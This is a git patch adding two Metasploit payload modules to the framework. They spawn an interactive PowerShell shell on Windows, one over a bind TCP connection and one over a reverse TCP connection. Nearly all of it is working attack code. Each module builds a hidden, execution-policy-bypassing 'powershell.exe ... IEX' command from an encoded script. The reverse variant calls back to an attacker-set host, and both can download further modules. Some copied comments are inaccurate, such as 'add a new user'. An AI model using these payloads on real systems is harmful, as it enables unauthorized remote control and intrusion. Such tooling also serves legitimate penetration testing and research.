From a02ea90824d4c88a0310b067c078722e3b804550 Mon Sep 17 00:00:00 2001 From: benpturner Date: Sat, 25 Apr 2015 16:49:22 +0100 Subject: [PATCH] New payloads which work with cmd --- .../singles/windows/powershell_bind_tcp.rb | 84 ++++++++++++++++++ .../singles/windows/powershell_reverse_tcp.rb | 86 +++++++++++++++++++ 2 files changed, 170 insertions(+) create mode 100644 modules/payloads/singles/windows/powershell_bind_tcp.rb create mode 100644 modules/payloads/singles/windows/powershell_reverse_tcp.rb diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb new file mode 100644 index 0000000000..2ecabe3f26 --- /dev/null +++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb @@ -0,0 +1,84 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/payload/windows/exec' +require 'msf/base/sessions/powershell' +### +# +# Extends the Exec payload to add a new user. +# +### +module Metasploit3 + + CachedSize = 1455 + + include Msf::Payload::Windows::Exec + include Rex::Powershell::Command + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Windows Interactive Powershell Session, Bind TCP', + 'Description' => 'Listen for a connection and spawn an interactive powershell session', + 'Author' => + [ + 'Ben Turner', # benpturner + 'Dave Hardy' # davehardy20 + ], + 'References' => + [ + ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::PowerShell, + )) + + # Register command execution options + register_options( + [ + OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]), + ], self.class) + # Hide the CMD option...this is kinda ugly + deregister_options('CMD') + end + + # + # Override the exec command string + # + def command_string + lport = datastore['LPORT'] + + template_path = File.join( + Msf::Config.data_directory, + 'exploits', + 'powershell', + 'powerfun.ps1') + + script_in = File.read(template_path) + script_in << "\npowerfun -Command bind" + + mods = '' + + if datastore['LOAD_MODULES'] + mods_array = datastore['LOAD_MODULES'].to_s.split(',') + mods_array.collect(&:strip) + print_status("Loading #{mods_array.count} modules into the interactive PowerShell session") + mods_array.each {|m| vprint_good " #{m}"} + mods = "\"#{mods_array.join("\",\n\"")}\"" + script_in << " -Download true\n" + end + + script_in.gsub!('MODULES_REPLACE', mods) + script_in.gsub!('LPORT_REPLACE', lport.to_s) + # Base64 encode the compressed file contents + script = Rex::Powershell::Command.compress_script(script_in) + "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})" + + end +end + diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb new file mode 100644 index 0000000000..d13f65ad39 --- /dev/null +++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb @@ -0,0 +1,86 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/payload/windows/exec' +require 'msf/base/sessions/powershell' +### +# +# Extends the Exec payload to add a new user. +# +### +module Metasploit3 + + CachedSize = 1439 + + include Msf::Payload::Windows::Exec + include Rex::Powershell::Command + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Windows Interactive Powershell Session, Reverse TCP', + 'Description' => 'Listen for a connection and spawn an interactive powershell session', + 'Author' => + [ + 'Ben Turner', # benpturner + 'Dave Hardy' # davehardy20 + ], + 'References' => + [ + ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::PowerShell, + )) + + # Register command execution options + register_options( + [ + OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]), + ], self.class) + # Hide the CMD option...this is kinda ugly + deregister_options('CMD') + end + + # + # Override the exec command string + # + def command_string + lport = datastore['LPORT'] + lhost = datastore['LHOST'] + + template_path = File.join( + Msf::Config.data_directory, + 'exploits', + 'powershell', + 'powerfun.ps1') + + script_in = File.read(template_path) + script_in << "\npowerfun -Command reverse" + + mods = '' + + if datastore['LOAD_MODULES'] + mods_array = datastore['LOAD_MODULES'].to_s.split(',') + mods_array.collect(&:strip) + print_status("Loading #{mods_array.count} modules into the interactive PowerShell session") + mods_array.each {|m| vprint_good " #{m}"} + mods = "\"#{mods_array.join("\",\n\"")}\"" + script_in << " -Download true\n" + end + + script_in.gsub!('MODULES_REPLACE', mods) + script_in.gsub!('LPORT_REPLACE', lport.to_s) + script_in.gsub!('LHOST_REPLACE', lhost.to_s) + # Base64 encode the compressed file contents + script = Rex::Powershell::Command.compress_script(script_in) + "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})" + + end +end +